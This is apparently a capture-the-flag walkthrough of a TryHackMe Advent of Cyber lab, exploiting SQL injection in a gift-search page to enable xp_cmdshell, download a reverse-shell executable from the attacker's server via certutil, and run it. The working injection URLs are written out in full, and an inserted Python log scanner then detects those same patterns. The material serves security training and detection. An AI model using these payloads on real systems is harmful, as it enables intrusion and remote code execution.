TryHackMe: Advent of Cyber 2023 (Day 10) Inject the Halls with EXEC Queries
“The Best Festival Company started receiving many reports that their company website, bestfestival.thm, is displaying some concerning information about the state of Christmas this year! After looking into the matter, Santa’s Security Operations Center (SSOC) confirmed that the company website has been hijacked and ultimately defaced, causing significant reputational damage. To make matters worse, the web development team has been locked out of the web server as the user credentials have been changed. With no other way to revert the changes, Elf Exploit McRed has been tasked with attempting to hack back into the server to regain access.”
It looks like a hacker is on the dark web auctioning off a bunch of Best Festival Company vulnerabilities.
“This forum post surely explains the havoc that has gone on over the past week. Armed with this knowledge, Elf Exploit McRed began testing the company website from the outside to find the vulnerable components that led to the server compromise. As a result of McRed’s thorough investigation, the team now suspects a possible SQL injection vulnerability.”
And honestly, I’m not surprised at this point. Their cybersecurity posture has been in shambles for years. Every Christmas another disaster.
Q1: Manually navigate the defaced website to find the vulnerable search form. What is the first webpage you come across that contains the gift-finding feature?
Here is the defaced website, lol.
If you scroll down a little way you can see a link for the gift search feature.
Q2: Analyze the SQL error message that is returned. What ODBC Driver is being used in the back end of the website?
This is the part of the website that accepts user input:
If you mess with the parameters and hit search, you can look at the URL to see what areas are potentially vulnerable to SQL injection.
http://xx.xx.xx.xxx/giftresults.php?age=child&interests=gadgets&budget=20
I replaced the age parameter with ' and was able to generate a SQL error.
http://xx.xx.xx.xxx/giftresults.php?age='&interests=gadgets&budget=20
Q3: Inject the 1=1 condition into the Gift Search form. What is the last result returned in the database?
I changed the URL to dump all of the gift results and found a flag at the end.
http://xx.xx.xx.xxx/giftresults.php?age=' OR 1=1 --&interests=toys&budget=20
Q4: What flag is in the note file Gr33dstr left behind on the system?
I enabled xp_cmdshell on the SQL server by passing this URL in the browser. This will eventually allow you to perform remote code execution on the server.
http://xx.xx.xx.xxx/giftresults.php?age='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; --
You don't get any confirmation in the web browser that this was successful, but switch to the command line for the next part, which will create an executable for a reverse shell.
Give that about 1 minute or so, and you should see this:
The next step is setting up a lightweight server on port 8000, which we can use to connect to the SQL server to deliver the executable.
Head back to the browser in order to use xp_cmdshell to download the executable. The first IP is the web server's and the second is that of whatever AttackBox you are using.
http://xx.xx.xx.xxx/giftresults.php?age='; EXEC xp_cmdshell 'certutil -urlcache -f http://xx.xx.xx.xxx:8000/reverse.exe C:\Windows\Temp\reverse.exe'; --
You can see that it worked by looking back at your lightweight server. You should see some GET requests like this:
Now, open up another terminal to set up a listener on port 4444.
And now BACK to the browser to send one more command through xp_cmdshell. This will execute reverse.exe and finally give us access to the reverse shell.
http://xx.xx.xx.xxx/giftresults.php?age='; EXEC xp_cmdshell 'C:\Windows\Temp\reverse.exe'; --
Your shell is now ready for you back at the listener.
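Every step of the attack above left its payload in the `age` parameter of a GET request, which is exactly what the SSOC should have been watching for. This is an added example (not from the TryHackMe room or this write-up) that scans constructed access-log lines for the injection patterns used above; the log format, IPs and timestamps are assumptions.

```python
"""Added example: flag giftresults.php requests carrying the SQL injection
patterns from the write-up. Log lines, IPs and timestamps are constructed."""
import re
from urllib.parse import urlsplit, unquote_plus

# Common-log-format request line; everything after the request line is ignored.
REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

# Signatures lifted from the injected URLs above, matched on the URL-decoded value.
SIGNATURES = [
    ("tautology",    re.compile(r"'\s*OR\s+1\s*=\s*1", re.I)),
    ("stacked-exec", re.compile(r";\s*EXEC\b", re.I)),
    ("xp_cmdshell",  re.compile(r"xp_cmdshell", re.I)),
    ("sp_configure", re.compile(r"sp_configure", re.I)),
    ("comment-end",  re.compile(r"--\s*$")),
]

def decode_query(target: str) -> dict[str, list[str]]:
    """Split on '&' only (so the ';' of a stacked query stays inside the value) and decode."""
    params: dict[str, list[str]] = {}
    for pair in urlsplit(target).query.split("&"):
        if pair:
            key, _, raw = pair.partition("=")
            params.setdefault(unquote_plus(key), []).append(unquote_plus(raw))
    return params

def inspect_request(target: str) -> list[tuple[str, str]]:
    """Return (parameter, signature) pairs for every query value that trips a signature."""
    return [(param, name)
            for param, values in decode_query(target).items()
            for value in values
            for name, pattern in SIGNATURES if pattern.search(value)]

def scan_log(lines: list[str]) -> list[tuple[int, str, list[tuple[str, str]]]]:
    """Return (line_no, request target, hits) for each log line that looks injected."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and (hits := inspect_request(m.group("target"))):
            findings.append((n, m.group("target"), hits))
    return findings

# Constructed sample: one legitimate search, then the three request shapes from the write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2023:09:00:01 +0000] "GET /giftresults.php?age=child&interests=gadgets&budget=20 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Dec/2023:09:00:07 +0000] "GET /giftresults.php?age=%27%20OR%201=1%20--&interests=toys&budget=20 HTTP/1.1" 200 9001',
    '10.0.0.9 - - [10/Dec/2023:09:01:30 +0000] "GET /giftresults.php?age=%27;%20EXEC%20sp_configure%20%27xp_cmdshell%27,%201;%20RECONFIGURE;%20-- HTTP/1.1" 500 88',
    '10.0.0.9 - - [10/Dec/2023:09:02:45 +0000] "GET /giftresults.php?age=%27;%20EXEC%20xp_cmdshell%20%27C:%5CWindows%5CTemp%5Creverse.exe%27;%20-- HTTP/1.1" 500 88',
]

if __name__ == "__main__":
    for line_no, target, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {target}\n    {hits}")
```

The legitimate search on line 1 produces no hit; the three attack requests each trip several signatures, with the stacked `; EXEC` plus `xp_cmdshell` combination being the one worth paging on.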
After this, navigate to the Administrator’s desktop, where you will find a note.
Looks like h4ck3r0192 forgot to delete the evidence. This gives us instructions for restoring the website to normal, and the flag for Q4.
Q5: What is the flag you receive on the homepage after restoring the website?
From here we just need to run the bat file to restore the website.
Head back to the website for the flag!
❤